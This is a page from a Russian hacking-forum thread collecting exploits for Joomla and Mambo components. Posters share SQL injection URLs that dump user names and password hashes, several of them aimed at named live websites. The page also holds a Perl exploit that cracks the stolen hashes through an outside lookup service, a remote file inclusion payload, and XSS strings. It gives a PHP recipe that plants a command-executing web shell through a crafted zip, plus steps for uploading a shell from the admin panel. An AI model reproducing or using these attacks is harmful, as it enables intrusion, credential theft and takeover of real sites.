ANTICHAT - Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Страница 11 из 37

« Первая

Последняя »

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов (https://forum.antichat.xyz/showthread.php?t=50600)

Тр⚡️ха

13.08.2008 18:30

com_clanwar Version: 1.2

PHP код:


		
			
    require ("../../configuration.php");

    $id = $_REQUEST['id'];

    MYSQL_CONNECT($mosConfig_host,$mosConfig_user,$mosConfig_password);

    mysql_select_db($mosConfig_db);

    $query = "select image_binary from jos_cwc_match_ss where id='$id'";

    $result = MYSQL_QUERY($query);

    $data = MYSQL_RESULT($result,0,"image_binary");

    Header( "Content-type: image/jpeg");

    echo $data;

magic_quotes_gpc off
http://joomla.ru/components/com_clanwar/getimage.php?id=1'+union+select+database()/*

USAkid

04.11.2008 08:56

Flash Tree Gallery

================================================== ================================================== ==============

[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability

Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

================================================== ================================================== ==============

[o] Vulnerable file

administrator/components/com_treeg/admin.treeg.php

include( "$mosConfig_live_site/components/com_treeg/about.html" );

[o] Exploit

http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]

================================================== ================================================== ==============

[o] Greetz

MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
VOP Crew [ Vrs-hCk OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke

================================================== ================================================== ==============

# milw0rm.com [2008-11-01]

swt1	11.11.2008 21:35

Joomla com_contactinfo 1.0 (catid)SQL-injection Vulnerability
________________________
http://www.milw0rm.com/exploits/7093

FraiDex

22.11.2008 00:03

Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability

Код:

###################################################################################################################

#Author: Ded MustD!e

###################################################################################################################

#Google Dork: com_thyme

###################################################################################################################

#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*

###################################################################################################################

#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*

###################################################################################################################



<creationDate>10/10/2005</creationDate>

<author>eXtrovert software</author>

<copyright>eXtrovert software</copyright>

<authorEmail>thyme@extrosoft.com</authorEmail>

<authorUrl>www.extrosoft.com</authorUrl>

<version>1.0</version>



# milw0rm.com [2008-11-21]

(с)milworm.com

USAkid

05.12.2008 08:21

Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln

PHP код:


		
			
Joomla Component mydyngallery                                                                                               AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                              

Discovered by : Sina Yazdanmehr (R3d.W0rm)                                        

Our Site : Http://IRCRASH.COM                                                      

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi      

                                                                          

Download : http://mydyngallery.mon-cottenchy.fr                                                                            

DORK : inurl:option=com_mydyngallery                                        

                                       [Bug]                                       

#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*

Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

PHP код:


		
			
#!/usr/bin/perl -w

# -----------------------------------------------------------

# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

# by s3rg3770 with athos :)

# demo http://www.disneyrama.com

# -----------------------------------------------------------

# Note: In lulz we trust :O

# -----------------------------------------------------------



use strict;

use LWP::UserAgent;

use LWP::Simple;





my $host = shift;

my $myid = shift or &help;



my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".

           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".

           "from+jos_users+where+id=${myid}--";



my $http = new LWP::UserAgent(

                               agent   => 'Mozilla/4.5 [en] (Win95; U)',

                               timeout => '5',

                             );  





my $response = $http->get($host.$path); 



if($response->content =~ /!_(.+?)!_/i)

{

     print STDOUT "Hash MD5: $1\n";

     print STDOUT "Password: ".search_md5($1)."\n";

     exit;

}

else

{

     print STDOUT "Exploit Failed!\n";

     exit;

}







sub search_md5

{

     my $hash = shift @_;

     my $cont = undef;



     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);

        

     if(length($hash) < 32 && !is_error($cont))

     {

          return $cont;

     }

}   





sub help

{

     print STDOUT "Usage: perl $0 [host] [user ID]\n";

     print STDOUT "by athos - staker[at]hotmail[dot]it\n";

     exit;

}

(c) milw0rm.com [2008-12-03 - 2008-12-04]

USAkid

05.12.2008 08:24

Цитата:

Сообщение от F4R

а из админки можно бд слить?

Есть неплохой вариант сделать такое... В несколько шагов:

Логинишься в админку --> ставишь компонент Joomla Explorer --> через него заливаешь шелл (в качестве альтернативы можно использовать просто просмотр configuration.php с логином и пассом от админа --> получаешь доступ к БД --> делаешь дамп... :)

foopi

07.12.2008 19:41

SQL-Inj в com_fireboard:

Код HTML:

http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/

+xss:

Код HTML:

http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'%3Ch1%3Elol%3C/h1%3E/Itemid,5/userid,78/

Qwazar

09.12.2008 19:05

Ещё один способ заливки шелла через админку, если прав на запись в /modules/ нет. Необходимо: PHP <=5.2.6:

Генерим архив (я использую либу из phpmyadmin):

Код:

<?php

include "Z:\home\localhost\www\Tools\phpmyadmin\libraries\zip.lib.php";

$zipfile = new zipfile();

$zipfile -> addFile("<? system($"."_GET['cmd']) ?>", "../../images/shell.php");

$fp = fopen("file.zip","wb");

fputs($fp,$zipfile -> file());

fclose($fp);

?>

и заливаем его через модули. По адресу http://site/images/shell.php будет лежать ваш шелл.

а можно заливать и не в images, а на хост к соседу, на том же сервере, если есть соотетствующие права. ;)

ImpLex

13.12.2008 18:27

Очередной дырявенький компонент.
Скачать мона на Joomla.ru. Побольше бы таких
wap4joomla <=1.5
Пример бажного скрипта... Вообще там почти сплошняком бажные скрипты...

PHP код:


		
			
<?php

/*******************************************************************\

*   File Name wap/onews/more.php                                    *

*   Date 30-04-2006                                                 *

*   For WAP4Joomla! WAP Site Builder                                *

*   Writen By Tony Skilton admin@media-finder.co.uk                 *

*   Version 1.5                                                     *

*   Copyright (C) 2006 Media Finder http://www.media-finder.co.uk   *

*   Distributed under the terms of the GNU General Public License   *

*   Please do not remove any of the information above               *

\*******************************************************************/

header("Content-Type: text/vnd.wap.wml");

echo"<?xml version=\"1.0\"?>"; ?> 

  <!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN"

            "http://www.wapforum.org/DTD/wml_1.1.xml">

<wml>

<? include("../../config.php"); ?>





<? 

$id=$_GET["id"];

DB_connect($dbn,$host,$user,$pass);

$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");

while ($row = mysql_fetch_object($result))    {





$title = $row->title; 

$done = $row->fulltext; 



?>

<card id="news1" title="<? echo $title ?>">

<do type="prev" label="Back"><prev/></do>

<p>

<?



$done=eregi_replace("&nbsp;"," ",$done);

$done=eregi_replace("&","&amp;",$done);

$done=eregi_replace("<BR>"," <br />",$done);

$done=eregi_replace("<br>","<br />",$done);

$done=eregi_replace("</p>","<br />",$done);

$done=eregi_replace("<strong>","<b>",$done);

$done=eregi_replace("</strong>","</b>",$done);

$done=eregi_replace("<B>","<b>",$done);

$done=eregi_replace("</B>","</b>",$done);

$done=eregi_replace("{mosimage}"," ",$done);

$title=eregi_replace("&","&amp;",$title);

$atags = "<b><br />";

$done = strip_tags($done, $atags);

$hmmm = "$done<br/>";



if (strlen($done)>$trim){

$wellover=substr($done,$trim+$over,1);

while($wellover!="\n"){

$wellover=substr($done,$trim+$over,1);

$trim=$trim-1;

};

$trim++;

if (isset($over)){

if ($over>=$trim){

$tmp=$over-$trim;

?>

 <a href="<? echo "more.php?id=$id&amp;over=$tmp"?>">Back...</a> 

<?

};



}else{

$over=0;

};



print substr($hmmm,$over,$trim);

$over=$over+$trim;

if (strlen($done)>$over){

?>

 <a href="<?print "more.php?id=$id&amp;over=$over"?>">...Read on</a> 

<?

};

} else {

print $hmmm;

}; 

 }   

 ?> 

</p></card> </wml>

опасная строчка

PHP код:


		
			
$id=$_GET["id"];

DB_connect($dbn,$host,$user,$pass);

$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id"); 

while ($row = mysql_fetch_object($result))    {





$title = $row->title; 

$done = $row->fulltext;

exploit
http://has-implex.narod.ru/wap4joomla.txt

Код:

http://site.ru/joomla/wap/onews/more.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--

(С)ImpLex

Ded MustD!e

13.12.2008 19:50

Уязвимости модулей и компоненотов Jooml'ы

Joomla Component Bibliography Blind-SQL/pXSS

Уязвимый продукт: Joomla Component Bibliography
Версия: <= 1.3
Дорк: "inurl:com_bibliography"

1. Blind-SQL
Уязвимость в файле bibliography.php.
Уязвимый кусок кода:

PHP код:


		
			
$count_query  = "SELECT id FROM ".$mosConfig_dbprefix."bibliography WHERE published = 1 AND catid=$catid";

$count_result = $database->setquery($count_query);

$count_result = $database->query();

$count        = mysql_num_rows($count_result);

$gesamtseiten = floor($count / $gl_perpage);

Из кода видно, что параметр $catid не обрамляется в кавычки и ранее нигде не фильтруется - это даёт нам возможность провести sql инъекцию.
Так же из кода видно, что полученное значение делится на число (количество страниц), а затем уже только выводится - это и есть причина слепоты в данной инъекции.

Exploit:

Код:

true: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=1/*

false: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=2/*

Example:

Код:

true: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=4/*&page=1

false: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=5/*&page=1

2. Пассивная XSS

Уязвимость в файле bibliography.php.
Уязвимый кусок кода:

PHP код:


		
			
else{

if ($letter=='All') echo "<font size='4'><strong>"._BIBLIOGRAPHY_ALL."</strong></font>";

elseif ($letter=='Other') echo "<font size='4'><strong>"._BIBLIOGRAPHY_OTHER."</strong></font>";

elseif ($letter=='[nothing]') echo "";

else echo "<font size='4'><strong>".$letter."</strong></font>";

Из кода видно, что параметр $letter не фильтруется.

Получаем пассивную XSS:

Код:

index.php?option=com_bibliography&func=display&Itemid=43&catid=25&letter=<script>alert(/grey/);</script>

P.S. здесь был Грей)))

Время: 10:34

Страница 11 из 37

« Первая

Последняя »

Показывать 40 сообщений этой темы на одной странице